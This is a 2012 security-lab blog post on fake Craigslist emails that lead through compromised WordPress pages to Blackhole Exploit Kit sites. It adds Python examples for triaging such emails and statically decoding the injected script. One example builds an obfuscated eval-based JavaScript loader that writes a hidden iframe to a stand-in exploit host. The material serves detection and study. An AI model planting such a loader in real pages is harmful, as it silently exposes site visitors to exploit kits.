June 6, 2012

Malicious URLs in Fake Craigslist Emails

Ran Mosessco Principal Security Researcher

Today, Websense® Security Labs™ ThreatSeeker™ Network has seen a barrage of malicious emails pretending to be automated notifications from Craigslist. These emails instruct the recipient to click a link to complete a Craigslist request. The links lead, via compromised web pages, to malicious web sites hosting the Blackhole Exploit Kit. So far we have seen over 150,000 of these emails in our Cloud Email Security portal. Websense Email Security and Websense Web Security protect against this kind of blended threat with ACE, our Advanced Classification Engine.


The emails have subject lines like:

POST/EDIT/DELETE : "Models for fine" (systems / network)

POST/EDIT/DELETE : "Studio4PaintWorkCatskills" (education)

POST/EDIT/DELETE : "Show Your Art" (cars+trucks)


The malicious emails are similar in appearance to legitimate Craigslist automated email notifications, including a legitimate-looking sender address and name:


Here we can see the headers and the SMTP transaction, showing the Craigslist sender address and mail server name that the message presents:
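The mismatch between what the headers present and where the link actually goes can be checked mechanically. The block below is an added example written for this page, not tooling from Websense or the post's author. It parses a constructed sample message (the addresses, host names and link are illustrative, not captured from the campaign) with Python's standard email and html.parser modules and reports where the claimed sender, the HELO name recorded by the receiving MX, and the link targets disagree:

```python
"""Triage helper for lookalike Craigslist notification emails.

Added example written for this page, not Websense/Forcepoint code. It checks
what the post points at: the "POST/EDIT/DELETE : ..." subject, a From header
and HELO name that claim craigslist.org, and a body link that really leads to
a third-party (compromised) site. The sample message is constructed; its
addresses, host names and link are illustrative.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

CLAIMED = "craigslist.org"
SUBJECT_RE = re.compile(r'^POST/EDIT/DELETE\s*:\s*".+"\s*\(.+\)\s*$')

SAMPLE_EMAIL = """\
Return-Path: <robot@craigslist.org>
Received: from mail.craigslist.org (unknown [203.0.113.45])
\tby mx.example.net with ESMTP id 4xYz; Wed, 6 Jun 2012 09:12:01 +0000
From: "craigslist - automated message, do not reply" <robot@craigslist.org>
To: victim@example.net
Subject: POST/EDIT/DELETE : "Models for fine" (systems / network)
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please complete your request by clicking the link below:</p>
<p><a href="http://wordpress-site.example/wp-content/uploads/go.php">
https://post.craigslist.org/u/confirm</a></p>
</body></html>
"""
# Control: same message, but the link stays on craigslist.org and the MX's
# reverse DNS agreed with the HELO name.
BENIGN_EMAIL = SAMPLE_EMAIL.replace(
    "http://wordpress-site.example/wp-content/uploads/go.php",
    "https://post.craigslist.org/u/confirm").replace("(unknown [", "(mail.craigslist.org [")


class LinkCollector(HTMLParser):
    """Collect (href, anchor text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Last two labels. Good enough here; a real tool uses the public suffix list."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def analyze(raw):
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    from_domain = parseaddr(str(msg.get("From", "")))[1].rpartition("@")[2].lower()
    # First hop as the MX recorded it: "from <HELO name> (<reverse DNS> [ip])".
    # Postfix writes "unknown" when the IP has no PTR record.
    hop = re.search(r"from\s+(\S+)\s*\(([^)]*)\)", str(msg.get("Received", "")))
    helo, rdns = hop.groups() if hop else ("", "")

    body = msg.get_body(preferencelist=("html", "plain"))
    collector = LinkCollector()
    collector.feed(body.get_content() if body else "")
    off_domain, text_mismatch = [], []
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        if registered_domain(host) != CLAIMED:
            off_domain.append(href)
        # Visible text that reads as a craigslist URL over a foreign href is the lure.
        text_host = urlparse(text).hostname or ""
        if text_host and registered_domain(text_host) != registered_domain(host):
            text_mismatch.append((text, href))

    indicators = []
    if SUBJECT_RE.match(subject):
        indicators.append("campaign subject pattern")
    if from_domain == CLAIMED and off_domain:
        indicators.append("From claims %s but links leave it" % CLAIMED)
    if text_mismatch:
        indicators.append("anchor text and href disagree")
    if helo.endswith(CLAIMED) and rdns.startswith("unknown"):
        indicators.append("HELO claims %s but MX could not verify the host" % CLAIMED)
    return {"subject": subject, "from_domain": from_domain, "helo": helo,
            "links_off_domain": off_domain, "text_href_mismatch": text_mismatch,
            "indicators": indicators,
            "verdict": "suspicious" if len(indicators) >= 2 else "no strong indicators"}


if __name__ == "__main__":
    print(analyze(SAMPLE_EMAIL)["indicators"], analyze(BENIGN_EMAIL)["verdict"])
```

The verdict is deliberately a count of independent indicators rather than one rule: a genuine Craigslist notification also matches the subject pattern, so the control message scores only one. The registrable-domain helper is a last-two-labels approximation; anything beyond a demo should consult the public suffix list.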


Clicking the link takes the victim to a compromised WordPress page containing obfuscated JavaScript:


After deobfuscation, we can see an iframe redirection to a malicious web site:
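As an added example of the deobfuscation step, not the script from the compromised site: the block below constructs a loader in the shape many injections of the period used (a string of shifted character codes, split and decoded at runtime, then passed to eval), decodes it statically in Python without executing any JavaScript, and flags the resulting iframe by the attributes that make it invisible. The payload and the landing host are invented for the example.

```python
"""Static decode of a char-code-array JavaScript loader and hidden-iframe check.

Added example for this page, not the script from the campaign. It builds a
loader in the shape many 2012-era injections used (a string of shifted
character codes, split and decoded at runtime, then eval'd), decodes it
without running any JavaScript, and inspects the iframe that falls out.
The payload and landing URL are constructed; real loaders vary, and
anything this static pass cannot match belongs in a sandboxed interpreter.
"""
import re
from urllib.parse import urlparse

# Constructed payload: what the loader writes into the page once decoded.
PAYLOAD = ("document.write('<iframe src=\"http://exploit-landing.example/index.php?r=1\" "
           "width=\"1\" height=\"1\" style=\"visibility:hidden;position:absolute;left:-9999px\">"
           "</iframe>');")
KEY = 7


def obfuscate(payload, key):
    """Produce the loader shape described above, so the example has input to decode."""
    codes = ",".join(str(ord(c) + key) for c in payload)
    return ('<script>var z="%s";var y=z.split(",");var x="";'
            'for(var i=0;i<y.length;i++){x+=String.fromCharCode(y[i]-%d);}'
            'eval(x);</script>' % (codes, key))


SAMPLE_PAGE = "<html><body><h1>Blog</h1>%s</body></html>" % obfuscate(PAYLOAD, KEY)

# The loader family: a quoted blob, the delimiter it is split on, and an
# optional offset subtracted before String.fromCharCode. Each is captured so
# the decoder is not tied to one sample's variable names or constants.
LOADER_RE = re.compile(
    r'var\s+\w+\s*=\s*"([^"]+)"\s*;.*?\.split\("([^"]+)"\).*?'
    r'fromCharCode\(\s*\w+\[\w+\](?:\s*-\s*(\d+))?\s*\)', re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def decode_loader(html):
    """Return the string the loader would eval, or None if no loader of this family matches."""
    m = LOADER_RE.search(html)
    if not m:
        return None
    blob, sep, offset = m.group(1), m.group(2), int(m.group(3) or 0)
    try:
        return "".join(chr(int(code) - offset) for code in blob.split(sep))
    except ValueError:            # blob was not all numbers: not this family
        return None


def find_iframes(decoded):
    """List iframes in decoded markup and flag the ones styled to be invisible."""
    found = []
    for m in IFRAME_RE.finditer(decoded):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
                  or "visibility:hidden" in style or "display:none" in style
                  or re.search(r"(left|top):-\d+", style) is not None)
        src = attrs.get("src", "")
        found.append({"src": src, "host": urlparse(src).hostname, "hidden": hidden})
    return found


def triage(html):
    decoded = decode_loader(html)
    iframes = find_iframes(decoded) if decoded else []
    return {"decoded": decoded, "iframes": iframes,
            "redirects_to": [f["host"] for f in iframes if f["hidden"]]}


if __name__ == "__main__":
    print(triage(SAMPLE_PAGE))
```

Static decoding only covers loaders whose shape the regular expression knows. When a sample does not match, run it in a sandboxed JavaScript interpreter with document.write and eval hooked and inspect what it tries to write, rather than guessing at the encoding.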


The malicious website tries to exploit the victim's computer using vulnerabilities such as:




More details can be found here.

The original links in the emails were detected by ACE in real time using our Real-Time Security Scanner. In addition, we have increased proactive detection of similar campaigns for our email security customers.


Ran Mosessco

Principal Security Researcher
